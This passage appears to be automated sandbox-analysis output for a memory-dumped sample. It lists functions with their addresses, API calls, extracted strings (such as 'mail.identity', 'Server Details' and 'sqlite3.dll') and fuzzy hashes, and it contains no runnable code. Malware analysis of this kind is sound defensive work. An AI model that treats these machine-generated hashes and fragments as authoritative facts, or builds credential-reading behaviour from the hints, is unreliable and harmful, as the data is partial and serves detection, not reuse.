                    • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                    • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                    Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                    • String ID:
                    • API String ID: 1886415126-0
                    • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                    • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                    • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                    • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                    Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen
                    • String ID: >$>$>
                    • API String ID: 39653677-3911187716
                    • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                    • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                    • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                    • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                    Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: @
                    • API String ID: 3510742995-2766056989
                    • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                    • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                    • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                    • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                    Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _strcmpi
                    • String ID: C@$mail.identity
                    • API String ID: 1439213657-721921413
                    • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                    • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                    Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00406640
                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                      • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                      • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                    • memcmp.MSVCRT ref: 00406672
                    • memcpy.MSVCRT ref: 00406695
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset$memcmp
                    • String ID: Ul@
                    • API String ID: 270934217-715280498
                    • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                    • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                    • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                    • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                    Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                    • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                    • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                    • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                    Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                    Strings
                    • recovered %d pages from %s, xrefs: 004188B4
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                    • String ID: recovered %d pages from %s
                    • API String ID: 985450955-1623757624
                    • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                    • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                    • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                    • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                    Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _ultoasprintf
                    • String ID: %s %s %s
                    • API String ID: 432394123-3850900253
                    • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                    • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                    • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                    • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                    Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadMenuA.USER32(00000000), ref: 00409078
                    • sprintf.MSVCRT ref: 0040909B
                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                    • String ID: menu_%d
                    • API String ID: 1129539653-2417748251
                    • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                    • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                    • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                    • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                    Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • failed memory resize %u to %u bytes, xrefs: 00411706
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _msizerealloc
                    • String ID: failed memory resize %u to %u bytes
                    • API String ID: 2713192863-2134078882
                    • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                    • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                    • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                    • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                    Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                    • strrchr.MSVCRT ref: 00409808
                    • _mbscat.MSVCRT ref: 0040981D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileModuleName_mbscatstrrchr
                    • String ID: _lng.ini
                    • API String ID: 3334749609-1948609170
                    • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                    • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                    • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                    • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                    Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                    Download Yara Rule
                    APIs
                    • _mbscpy.MSVCRT ref: 004070EB
                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                    • _mbscat.MSVCRT ref: 004070FA
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscat$_mbscpystrlen
                    • String ID: sqlite3.dll
                    • API String ID: 1983510840-1155512374
                    • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                    • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                    • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                    • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                    Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileString
                    • String ID: A4@$Server Details
                    • API String ID: 1096422788-4071850762
                    • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                    • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                    • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                    • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                    Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID:
                    • API String ID: 438689982-0
                    • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                    • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                    • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                    • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                    Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLocalmemcpymemsetstrlen
                    • String ID:
                    • API String ID: 3110682361-0
                    • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                    • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                    • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                    • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                    Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID:
                    • API String ID: 3510742995-0
                    • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                    • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                    • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                    • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8